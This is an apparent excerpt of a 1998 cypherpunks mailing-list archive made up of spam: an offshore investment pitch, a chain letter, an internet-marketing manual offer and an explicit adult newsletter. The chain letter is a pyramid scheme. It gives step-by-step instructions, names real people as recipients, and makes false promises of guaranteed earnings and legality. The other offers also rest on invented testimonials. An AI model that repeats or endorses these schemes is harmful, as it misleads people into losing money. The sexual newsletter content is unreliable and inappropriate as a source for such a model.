dollar, I might get enough to sustain my studies for a few years. It does not make me happy to
request alms, but I truly see no other alternatives.

     Those of you who wish to send me a single dollar may send it to the address listed below.
Nothing else will be sent by me to your account. This is not a mailing list. Those with
questions may reach me at Tkettle@Juno.com. Thank you for your time and patience.

Sincerely,

Thomas Kenneth Wootten
24 Victoria Drive
South Burlington, VT
05403






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ForInformationVisitUs@OurWebSite.Now
Date: Sun, 18 Jan 1998 23:37:10 -0800 (PST)
To: SmartFolks@UwiseFolk.com
Subject: *** OFF-SHORE INVESTMENTS ***
Message-ID: <96812119_29274965>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******

*** OFF-SHORE INVESTMENTS ***

Get A Higher Rate of Return on Your Investments
Projects Audited
by
*** Coopers & Lybrand and Price Waterhouse ***

Ever wished you could earn a rate of return on your investments that
have traditionally been enjoyed only by the very wealthy?

Welcome to Cyber Ventures Ltd. - Your gateway to outstanding and private
off-shore investment opportunities.

Cyber Ventures Ltd. is an on-line venture capital and financing company
incorporated under the laws of the Isle of Man.  Its primary function is
to raise equity capital for profitable venture capital projects.

Each project promoted by Cyber Ventures Ltd. complies to established
investment criteria and is fully audited to increase the security of
your investments.

Cyber Ventures Ltd. takes an equity stake in each project right along
with you the investor and is a part of the management team of all 
target investments.

Cyber Ventures Ltd. is designed for the relatively small investor so
investments are as little as $30 and a maximum of $30,000 for any 
single transaction.

Investors profit through: 
   - Project profit share
   - Capital appreciation
   - Interest on capital
   - Referral commission on sales

For more information regarding Cyber Ventures Ltd., its Policies,
Project Selection Criteria, Investment Criteria, Current Projects,
the Investment Structure, Auditors, and how you can participate in
this outstanding and private investment vehicle, you may contact 
us at:

Cyber Ventures Web Site:	http://www.cvltd.com
E-mail: 	Info@cvltd.com
	
Fax-On-Demand:	+1(703) 834-8990 Doc #110 (Please call from a fax)
Direct FAX :	+27(21) 948-3188
Toll Free USA FAX :	+1(888) 218-7034
Message Center:	+1(888) 218-7034
Cyber Venture Orders:	+27(21) 948-3183

******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: Bergston@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 97565462@aol.com
Date: Mon, 19 Jan 1998 02:01:39 -0800 (PST)
To: wealth.seekers@entire.internet
Subject: Fastest & Easiest way to make money
Message-ID: <199801190219.RAA111@mrin60.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a one time mailing and your address has already been deleted from
our database.
Please take time to read this before you erase it!
I would like to let you in on a good idea...
I  NEVER THOUGHT I'D BE THE ONE TELLING YOU THIS....
I  ACTUALLY READ & ACTED ON A PIECE OF E-MAIL,
AND NOW I'M GOING TO EUROPE FOR THE VACATION!
My name is Jason  ; I'm a 34-year-old father, husband, and full time
office manager.  
As a rule, I delete all unsolicited "junk" e-mail and use my account
primarily for  business.  
I received what I assumed was this same e-mail countless times
and deleted it each time.
About two months ago I received it again and, because of the catchy subject
line, I finally read it. Afterwards, I thought, "OK, I give in, I'm going
to try
this. I can certainly afford to invest $20 and, on the other hand, there is
 nothing wrong with creating a little excess cash." I promptly mailed four
 $5 bills and, after receiving the reports paid a friend of mine a small
fee to 
send out some e-mail advertisements for me.  
After reading the reports, I also learned how easy it is to bulk e-mail for
free!

I was not prepared for the results.  Everyday for the last six weeks, my 
P.O. box has been overflowing with $5 bills; many days the excess fills up 
an extra mail bin and I've had to upgrade to the corporate-size box!  
I am stunned by all the cash  that keeps rolling in!

I promise you, if you follow the directions in this e-mail and be prepared
to
eventually set aside about an hour each day to follow up (and count your
money!), you will make at least as much money as we did.  You don't 
need to be a wiz at the computer, but I'll bet you already are.  
 If you can open an envelope,remove the money, and send an 
e-mail message, then you're on your way to the bank. 
Take the time to read this so you'll understand how easy it is. Believe me,
it
works!

                                                       GO FOR IT NOW!
Sincerely,

Jason

The following is a copy of the e-mail I read:

This is a LEGAL, LOW-COST, MONEY-MAKING PHENOMENON.

PRINT this letter, read the directions, THEN GET STARTED TODAY!

You are about to embark on the most profitable and unique program you may
ever see.  Many times over, it has demonstrated and proven its ability to
generate large amounts of cash.  This program is showing fantastic appeal
 with a huge and ever-growing on-line population desirous of additional
income.

This is a legitimate, LEGAL, money-making opportunity.  It does not require
you to come in contact with people, do any hard work, and best of all, you
never
have to leave the house, except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!  Simply follow the
easy 
instructions in this letter, and your financial dreams will come true! When
followed correctly, this electronic, multi-level marketing program works
perfectly... 100% OF THE TIME!

Thousands of people have used this program to:

    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!

This is your chance, so read on and get started today!

----------------------------------------------------------------------------

------
OVERVIEW OF THIS EXTRAORDINARY 
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------

------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to nothing
to produce and e-mail. As with all multi-level businesses, we build our
business by recruiting new partners and selling our products.  Every state
 in the U.S.allows you to recruit new multi- level business online (via
your computer).

The products in this program are a series of four business and financial
reports costing $5.00 each.  Each order you receive via "snail mail" will
include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they
     ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!
 The $5.00 is yours!  This is the EASIEST electronic multi-level marketing
business anywhere! 

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you
don't order 
them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and  YOUR 
NAME & RETURN ADDRESS (in case of a problem) to the person  whose name 
appears on the list next to the report. MAKE  SURE YOUR RETURN ADDRESS IS 
ON YOUR ENVELOPE IN CASE OF ANY MAIL PROBLEMS!

     *  When you place your order, make sure you order each of the
        four reports.  You will need all four reports so that you can save
        them on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the four
        reports. Save them on your computer so they will be accessible
        for you to send to the 1,000's of people who will order them
        from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed
     next to each report, or their sequence on the list, in any way other
     than is instructed below in steps "a" through "f" or you will lose
     out on the majority of your profits.  Once you  understand the way
     this works, you'll also see how it doesn't work if you change it.
     Remember, this method has been tested, and if you alter it, it will
     not work. ( I talked to a friend last month who has also done this
     program.  He said he had tried "playing" with it to change the
     results.  Bad idea.... he never got as much money as he did with
     the un-altered version.  Remember, it's a proven method!

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, take this advertisement and 
         remove the name and address under REPORT #4. This person has 
         made it through the cycle and is no doubt counting their 50 grand!

    c.  Move the name and address under REPORT #3 down to  REPORT #4.  

    d.  Move the name and address under REPORT #2 down to REPORT #3.

    e.  Move the name and address under REPORT #1 down to REPORT #2.

    f.  Insert your name/address in the REPORT #1 position.

Please make sure you copy every name and address ACCURATELY!

3.  Take this entire letter, including the modified list of names, and
     save it to your computer.  Make NO changes to the instruction
     portion of this letter.

4.  Now you're ready to start an advertising campaign on the
     INTERNET!  Advertising on the 'Net is very, very inexpensive,
     and there are HUNDREDS of FREE places to advertise. Another
     avenue which you could use for advertising is e-mail lists.  
     You can buy these lists for under $20/2,000 addresses or you
     can pay someone a minimal charge to take care of it for you. 
     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the
     report they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY
     SERVICE ON ALL ORDERS!  This will guarantee that the e-mail THEY
     send out, with YOUR name and address on it, will be prompt
     because they can't advertise until they receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------

*** Order Each REPORT by NUMBER and NAME ***

Notes:

-  ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH REPORT
   CHECKS NOT ACCEPTED
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL 
-  Make sure the cash is concealed by wrapping it in at least two
   sheets of paper  
-  On one of those sheets of paper, include: (a) the number & name
   of the report you are ordering, (b) your e-mail address, and
   (c) your name & postal address.

PLACE YOUR ORDER FOR THESE REPORTS NOW:
______________________________________________________________

REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

     ORDER REPORT #1 FROM:  

 Jason  Baek
            15507 S. Normandie Ave. # 167.
            Gardena, Ca 90247-4028
______________________________________________________________

REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

      ORDER REPORT #2 FROM:

 Brain
            150 Main St N # 74075
            Brampton, Ont., Canada
            L6V 4J7

______________________________________________________________

REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

      ORDER REPORT #3 FROM:

 AMF Investments
            2319 South Kirkwood # 144
            Houston, TX 77077

______________________________________________________________

REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

      ORDER REPORT #4 FROM:

            Fusion Marketing Ltd.
            8895 Towne Centre Drive
            Suite 105-303A
            La Jolla, Ca 92122-5542
______________________________________________________________

HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$

Let's say you decide to start small just to see how well it works. Assume
your goal is to get 10 people to participate on your first level. (Placing
a lot of
FREE ads on the internet will EASILY get a larger response.) 
Also assume that everyone else in 
YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this example to 
achieve the STAGGERING results below.

1st level--your 10 members with
$5............................................$50
2nd level--10 members from those 10 ($5 x 100).....................$500
3rd level--10 members from those 100 ($5 x 1,000)............$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
                      THIS TOTALS        ----------->$55,550

Remember friends, this assumes that the people who participate only recruit
10 
people each.  Think for a moment what would happen if they got 20 people to

participate!  Most people get 100's of participants! THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can
afford $20). You 
obviously already have an Internet connection and e-mail is FREE! 

REPORT#3 shows you the most productive methods for bulk e-mailing and 
purchasing e-mail lists.  Some list & bulk e-mail vendors even work on
trade!

About 50,000 new people get online every month!

******* TIPS FOR SUCCESS *******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and
     follow the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them
    when the orders start coming in because:

        When you receive a $5 order, you MUST send out the requested
        product/report to comply with the U.S. Postal & Lottery Laws, Title
        18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S.
Code,
        also Code of Federal Regs. vol. 16, Sections 255 and 436, which
state 
        that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the 
    instructions exactly, your results WILL be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL
    SUCCEED!


******* YOUR SUCCESS GUIDELINES *******

Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue 
advertising until you do.  Then, a couple of weeks later you should receive
at least 
100 orders for REPORT #2.  If you don't, continue advertising until you do.

Once you have received 100 or more orders for REPORT #2, YOU CAN RELAX, 
because the system is already working for you, and the cash will continue
to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of
a 
DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching 
which report people are ordering from you.  If you want to generate more
income, 
send another batch of e-mails and start the whole process again!  There is
no limit 
to the income you will generate from this business!


******* T  E  S  T  I  M  O  N  I  A  L  S *******

     This program does work, but you must follow it EXACTLY!  Especially
the rule of 
not trying to place your name in a different position, it won't work and
you'll lose a lot 
of potential income.  I'm living proof that it works.  It really is a great
opportunity to 
make relatively easy money, with little cost to you.  If you do choose to
participate, 
follow the program exactly, and you'll be on your way to financial
security. 
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I am a
cost accountant 
with a major U.S. Corporation and I make pretty good money. When I received
the 
program I grumbled to Doris about receiving "junk mail." I made fun of the
whole 
thing, spouting my knowledge of the population and percentages involved.  I

"knew" it wouldn't work. Doris totally ignored my supposed intelligence and
jumped 
in with both feet. I made merciless fun of her, and was ready to lay the
old "I told you 
so" on her when the thing didn't work... well, the laugh was on me!  Within
two weeks 
she had received over 50 responses. Within 45 days she had received over 
$147,200 in $5 bills! I was shocked!  I was sure that I had it all figured
and that it 
wouldn't work.  I AM a believer now. I have joined Doris in her "hobby."  
I did have 
seven more years until retirement, but I think of the "rat race" and it's
not for me. We 
owe it all to MLM.
           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to you.  Any
doubts 
you have will vanish when your first orders come in. I even checked with
the U.S. 
Post Office to verify that the plan was legal. It definitely is! IT
WORKS!!!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this system is
honest, lawful, 
extremely profitable, and is a way to get a large amount of money in a
short time. I 
was approached several times before I checked this out. I joined just to
see what 
one could expect in return for the minimal effort and money required.  To
my 
astonishment, I received $36,470.00 in the first 14 weeks, with money still
coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make up my
mind to 
participate in this plan. But conservative that I am, I decided that the
initial 
investment was so little that there was just no way that I wouldn't get
enough orders 
to at least get my money back. Boy, was I surprised when I found my
medium-size 
post office box crammed with orders!  For awhile, it got so overloaded that
I had to 
start picking up my mail at the window. I'll make more money this year than
any 10 
years of my life before. The nice thing about this deal is that it doesn't
matter where 
in the U.S. the people live. There simply isn't a better investment with a
faster return.
         Mary Rockland, Lansing, MI

    I had received this program before. I deleted it, but later I wondered
if I shouldn't 
have given it a try. Of course, I had no idea who to contact to get another
copy, so I 
had to wait until I was e-mailed another program...11 months passed then it
came...I 
didn't delete this one!...I made more than $41,000 on the first try!!
          D. Wilburn, Muncie, IN

     This is my third time to participate in this plan. We have quit our
jobs, and will 
soon buy a home on the beach and live off the interest on our money.  The
only 
way on earth that this plan will work for you is if you do it. For your
sake, and for your 
family's sake don't pass up this golden opportunity.  Good luck and happy 
spending!
           Charles Fairchild, Spokane, WA


ORDER YOUR REPORTS TODAY AND
GET STARTED ON YOUR ROAD TO 
GETTING EXTRA CASH DAILY!

NOW  IS THE TIME FOR YOUR TURN

DECISIVE ACTION YIELDS
POWERFUL RESULTS





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Important.News@hotmail.com
Date: Sun, 18 Jan 1998 12:05:05 -0800 (PST)
To: Important.News@hotmail.com
Subject: Re: Hi  :-)
Message-ID: <199801182005.GAA32490@startide.odyssey.com.au>
MIME-Version: 1.0
Content-Type: text/plain




"I finally found the secrets I've been looking for.  Your manual  
tells all and has given me the tools I need to succeed, finally a 
genuine Internet insider tells all!  If you're doing business on the 
web or have ever wanted to, this is a must have.  You're the best,
I'm making your manual into my Internet Bible! Thanks a million!"

Best Regards,
(satisfied customer) Florida

WOW!, What a value your program is! Just the secrets on
email was worth the price alone, not to mention all the other
valuable things you included. I have already put up some ads
and I eagerly anticipate positive results.

Tom Hatcher - Minnesota


----------------------------------------------------------------------------------------

Hello Internet friend,

What I am going to share with you may well be, for many of you, 
THE opportunity to start a unique, very successful business or take an 
EXISTING one to new untouched heights, by taking advantage of some 
breakthrough trends that are making "marketing history!"  You will soon
discover the art of . . . 

"How to Really Make Money on the Information Superhighway!"

Some of you may already have purchased some "electronic
marketing course" or tried to market some product online.
Maybe you even made a sizeable profit! Whatever the case may
be; No matter how successful you are right now, you can
profit tremendously from what we are about to tell you!

FACT:  ANYONE WHO HAS THE DRIVE TO SUCCEED CAN ACTUALLY MAKE A SIZABLE PROFIT ON THE INTERNET.

FACT:  NOT MANY PEOPLE ARE WILLING TO TAKE THE TIME TO ACTUALLY DO IT.

Why would people want to pass up this extremely valuable money making opportunity?

Because learning is the key to succeeding online.  Marketing on the Internet 
requires a wealth of  knowledge.  To learn everything you need to know 
about Marketing on the Internet takes more time than any human being 
can spare.  The small amount of Internet marketers actually making a 
sizable profit know this all too well. 

Now think about this...

WHAT IF? I could provide YOU with an incredible Marketing Package 
that encompasses all the "How To" information you need to be a success 
on the Internet.  This phenomenal package includes DETAILED Internet 
SECRETS (we don't hold anything back, its all here folks!!), which explains 
in detail how to Profit from the Internet Explosion.  Whether you have a 
business of your own or you want to start one.  It's filled with over 45 packed 
pages revealing the secrets about electronic marketing so many other online 
marketers DON'T want you to know.

I thought that might interest YOU.

Let me explain.

<><><><><><><><><><><><><><><><><><><><><><><><>
 
Right now there are over sixty million people surfing the Internet.  By
the year 2000, that figure is expected to more than double. With so many 
people using the Internet, smart "net"repreneur's are taking advantage 
of what this new (in terms of true commercial application) and exciting 
medium has to offer.

The Internet presents one of the best ways to make money that has 
ever been introduced. On any given day you have the opportunity to 
reach more people than most cities have population wise. This is the 
reason so many businesses are scrambling to make their presence
known on the Internet. 

Being "online" offers a person the ability to reach multitudes of people 
from all over the world.  It also offers, to those who know how, THE 
ABILITY TO MAKE EXCELLENT MONEY. And we do mean 
excellent money!!!

CONSIDER THIS POSSIBILITY: You wake up in the morning and 
you put on a pot of coffee. As you sip on your cup of hot "brew" you 
saunter over and turn your computer on. Then, as your monitor glows 
from dim to bright, you find that you have inquiries from all sorts of 
people requesting what you have to offer. Later, after you have 
finished reading your inquiries, you stroll out to your mailbox. You 
find it is filled with letters from people from all across the world! 
What's even better though, is that the letters are FILLED WITH 
MONEY; cash, checks, and money orders. Then, after tallying 
up the totals, you find that you have made anywhere between  
$200 to $1,000 and it isn't even one o'clock in the afternoon. 
 
Think of it: NO boss, NO traffic, and NO annoying Co-workers. 
Wouldn't it feel great to wake up in the morning knowing you 
are going to be making excellent money but don't have to leave 
your house to do it!?!  Wouldn't your life be far less complicated?

The truth is, you can be one of those who become financially
independent via the Internet. AND THE BEST PART IS...IT 
DOESN'T REQUIRE A LOT OF MONEY!!

What it does require is the knowledge of how, what, and where 
to do it. That is where we can help. We provide you with 
the knowledge of how to begin earning substantial income from 
your computer via the "information superhighway".   

We can remember how overwhelming the Internet seemed when we
were first introduced to it.  We realized the marketing and profit 
potential the Internet holds, but really had no idea how to pursue it. 
In our thirst for answers and knowledge, we purchased everything 
we could find that had information on the How, What, and Where. 
We spent thousands of dollars, but we now know what works and
what doesn't.  No where, in all of our searching, could we find a 
complete packet of information for all of our questions.  That is why 
we decided to write this report.  We have compiled every proven 
method and secrets that we have learned along the way into one 
complete, easy to understand report.

This PROVEN REPORT makes believers of skeptics!  

Sound too good to be true?  That's what others have said.  That is, 
until they received their reports and saw for themselves just how easy
it is to make money on the net!


Hi NI,

I received your report and free bonuses last Saturday and wanted to
congratulate you on a job well done. I read through your report "How 
To Profit From The Internet" and I'm very impressed.  I have bought 
other books and manuals about  Online Marketing, Direct Marketing, 
E-mail, Mail Order, etc. Yours is the only one that explains the
subject  in an easy to understand language.  I finally found the 
secrets I've been looking for. 

Once again, Great Job!

Sincerely,
John Strand - Satisfied Customer



My father has always told me, "remember, Michele, there is no free 
lunch in life. You get out of life what you put into it."  Through trial 
and error and a somewhat slow frustrating start, I purchased your 
report and finally figured out how to start a very profitable business
from my home. Your report is great, you give the average person 
the tools and secrets to succeed.  I know my dad is very proud of 
me now.

I can't thank you enough =)

Michele B from Oregon


Good Morning,

I hope this finds you well.  I received your program yesterday after-
noon and read it cover to cover.  You have put together a very 
valuable resource indeed.  I have finally found the program that 
tells all!  Your program has given me the tools I need to succeed.  
Your program could truly end up being the best $39.95 I ever spent!

Your the best, I'm making your manual into my internet Bible!!  
Thanks a million!

Best Regards,
Mary Wecker


This is a wonderful opportunity, we urge you to take advantage of it. 
You won't find too many people that will give away ALL of their
secrets!!  The majority of the rich people today have copied what  
someone else is or has been doing.  That is what we are offering 
you now--a chance to copy our success!!  It is very easy and we 
ARE for REAL!

Here's a little more incentive to check this out...

~IF YOU ORDER WITHIN 3 DAYS~

We will send you:

 **** FREE $400 Bulk e-mail Software ****
 **** FREE $200 Check by phone, fax, E-mail Software ****
 **** FREE $10 Calling Card ****
 
----PLUS----

We will send you a list of over 100 major search engines ready to
surf on the Internet or to place a free link to your web page.   Also, 
you will receive a list of  98 of the best inexpensive newspapers to 
advertise in (U.S. orders only).  The list is complete with papers name, 
city, phone number, circulation and frequency  (Daily or Weekly).  

We will also include five free BONUS reports that include these topics:
 How to Protect your PC from Viruses
 How to get 300+ Quality Prospect to E-mail you Weekly
 Tips and Secrets to Advertising with the major Online Services
 What's wrong with the World Wide Web 
 Tax Advantages for the Home Business Owner.  
You will find that these five reports by themselves are worth 
thousands of dollars to you. These bonuses alone are worth several 
times the cost of the report.

We will also give you a secret list of over 1500 of the best Web sites 
where you can place a FREE advertisement.  This is a list we use 
every day to run our business and we are giving it to you!  Imagine 
what a great offering we are giving you for FREE! 

And we're not through, if you order RIGHT NOW,  we will give you 
15 FREE "How to Reports" that you are free to market and sell on the 
Internet or through mail order for $15-30 each.  They are 45-60 
informational packed pages each.  A great way to start your own 
Net based business!  The topics are;

            1)   Earn Extra Dollars with a Home Based Answering Machine 
            2)   How to Buy a Car with Bad Credit 
            3)   How to Make Thousands of Dollars Winning Contests 
            4)   U.S. Government Auction Sales 
            5)   An Insider's Guide to Finding and Obtaining Grant Money 
            6)   Home Based Business for Fun and Profit 
            7)   How to Get a Job Fast 
            8)   How to Make Money Without Leaving Your House 
            9)   How to Turn the Hobby of Photography into Thousands 
           10)   Making Money at Garage Sales, Swap Meets, and Flea Markets 
           11)   How to Get Paid for Watching TV 
           12)   Getting Your Start in Theater, Television, and Movies 
           13)   Wills or Trusts?  The Case for Living Trusts 
           14)   How To Find Work with the Federal Government 
           15)   How to Write Almost Anything and Get Paid for it!

Are we nuts?

No, it just shows how confident we are that you'll be delighted with 
the information you'll have...just like the others who are already using 
the information and making money.  You will be surprised how quickly 
you can be earning money on the Internet!
 
So you are probably thinking to yourself, this is wonderful, but how much?  
$149.95,  $99.95 maybe even  $79.95?  You may have seen other companies 
marketing "How To" information on the Internet and charging these prices. 
People are actually buying these packages at these prices.  Why?  People 
want to know how to market a product or service the "Right" way on the 
Internet.  "How to Profit from the Internet" could easily sell for any of the 
above prices.  However, we feel that we would rather help those who 
may not have the ability to pay such a price in order to be successful.  
That is why we are offering "How to Profit from the Internet" for the 
unbelievable low price of $39.95.

That's right, that was not a typo...$39.95.  

Still skeptical???  Lets put that to rest right now.  We will make this 
completely risk free for you.  If you are not 100% satisfied with the
information you receive, and believe that you cannot use it to start a
successful business or increase your current business profits, return it
within 10 days and we will refund your money.  No questions asked!!  
(Because this information is very easy to copy, the guarantee is only 
available on Disk Orders).

I have sold this package at much higher prices in the recent past and will be
forced to raise my prices in the very near future. One of the things
you will learn in my course is to constantly test your market.  I am
currently in the price testing phase of this marketing campaign.
On February 1st, 1998 I will be raising the price of this package
back up to $79.95 and eventually up to $129.95 to test the upscale market.
If you act quickly, you have the opportunity to get these materials today
for the unbelievable low price of $39.95.

So, if you are seriously interested in learning how to acquire wealth 
by being online, ACT NOW!!  This won't last for long!

Print out this form and mail it to the address below, with your $39.95 
cash, check, money order or credit card information.


Natural Instincts
4676 Commercial St. SE Suite 201 
Salem, Oregon 97302   

Thank you =) 

****Please print out the order form and mail it along with your payment****

**********************************************************
                                 ORDER FORM
**********************************************************

NAME______________________________________________________

ADDRESS___________________________________________________

CITY_______________________ STATE__________ ZIP__________

Deliver "How to Profit from the Internet" to the following email address:

E-MAIL ADDRESS____________________________________________
(please note, all orders must include an email address incase we encounter a 
problem with processing)

Area code and Phone number (Optional)

Day time __________________  Evening:  ________________________

[ ] If you prefer to have the report on disk, please check here.  Please 
include an additional $3.00 for shipping and handling, thank you.

Please check one of the following:

[ ]  I'm ordering within 3 days, please send my FREE software, $10.00 
calling card, 15 How to Reports and "How To Profit From The Internet" 
and FREE bonuses for the unbelievably low price of $39.95 today.

[ ]  I'm not ordering within the first 3 days of receiving this letter, so I 
agree to pay $39.95 for "How to Profit from the Internet" by itself, 
less the bonus package.

Payment Method:                             [Internal code 138108]

[ ] Check 

[ ] Cash

[ ] Money Order

[ ] Credit Card, please make sure to include the mailing address above!
          
             [  ] Visa       [  ]  MasterCard

Name of Credit Card: _____________________________

Name as it appears on Card: _________________________________

Card Number: __________________________________

Expiration Date: _____ / _____

Signature of Card Holder: _________________________.

***********************************************************
"In mail-order work, anyone with imagination, determination, and a
willingness to study and experiment may have very little difficulty
getting started. A number of the most successful one-man operations
obtain an income as high as $40,000 to $100,000 a year."

                - U.S. Department of Commerce
************************************************************                                                                          
THE MARKET IS HERE - TODAY!   TAKE ADVANTAGE OF IT!!!!!
After you receive your report, I'll answer any questions time permits 
via email.  I'm looking forward to helping you succeed!












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 19 Jan 1998 05:20:52 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Jan 19 '98
Message-ID: <19980119083240.22195.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

HARD CITY
Ouch -  you bet  it's hard.  What is?  Stupid question!  One
visit to this website  and the search  for porn becomes more
of a daily jaunt.  It's simply  packed with  stuff to do and
see,  and what's more, it's FREE for a limited trial period!
Hard City ......................... http://www.hardcity.com/

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Free Memberships on the net
http://www.sexscandal.com
We rank the very best sex sites. Free memberships all the
time as we search the net for the hottest values and the
best looking gals.

LOUISE ON HOLIDAY
This  is  a  simple  website   of  a  young  Yorkshire  girl
sunbathing in someones backyard. She starts out rubbing baby
oil all  over her body, then  removes her bathing suit. This
is one hot little lady. You  have  to  see this one. One hot
honey! ...... http://www.netcomuk.co.uk/~adrian_w/hols1.html

MEXICAN PUSSY FIESTA
Hola amigo's! This is a paysite but they have 5 images or so
to sample. Click on sample  pics,  this leads to some pretty 
large  high  quality  images  of  group  sex,  lesbians  and
facials. Stop by  to  see  the  lovely  latina  ladies spicy
tacos, olay! ............. http://aruba.janey.com/~slurping/

TEENS PLAYGROUND
This website  offers  up  some  great  free  pictures! Asian
teens, big boobs and more. One  set  of tits in there is the
biggest fucking tits I have ever seen! You have to see these
boobs! ........................... http://www.vip-master.no/

YOUNG EXPOSED WOMEN
Check out Sarah, Cybil, Denise and Colleen, you will be glad
you did. Each girl is easy  to find, click the thumbnail pix
then your sent to a layout of  each one. Sponge baths in the
haybarn,  legs spread wide.  Blondes, brunettes, well built!
Young Exposed Women ................... http://www.ywex.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
20vids+Chat .. http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
KARIN: Visit Karin and her hubby Albert to be transferred to
the sordid affairs of  German  swingers.  They are kinky and
know how to have a good time! Couples like this make surfing
worthwhile.
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Adult Story of the Day:  Read  something for a change! Every
day the Adult Story of the Day  offers you a free erotic sex
story for your reading pleasure.............................
............................... http://www.adultstories.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?190
Pic  2 ........................... http://137.39.63.229/?191
Pic  3 ........................... http://137.39.63.229/?192
Pic  4 ........................... http://137.39.63.229/?193
Pic  5 ........................... http://137.39.63.229/?194
Pic  6 ........................... http://137.39.63.229/?195
Pic  7 ........................... http://137.39.63.229/?196
Pic  8 ........................... http://137.39.63.229/?197
Pic  9 ........................... http://137.39.63.229/?198
Pic 10 ........................... http://137.39.63.229/?199

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Important.News@hotmail.com
Date: Wed, 21 Jan 1998 10:26:26 -0800 (PST)
To: Important.News@hotmail.com
Subject: Regarding
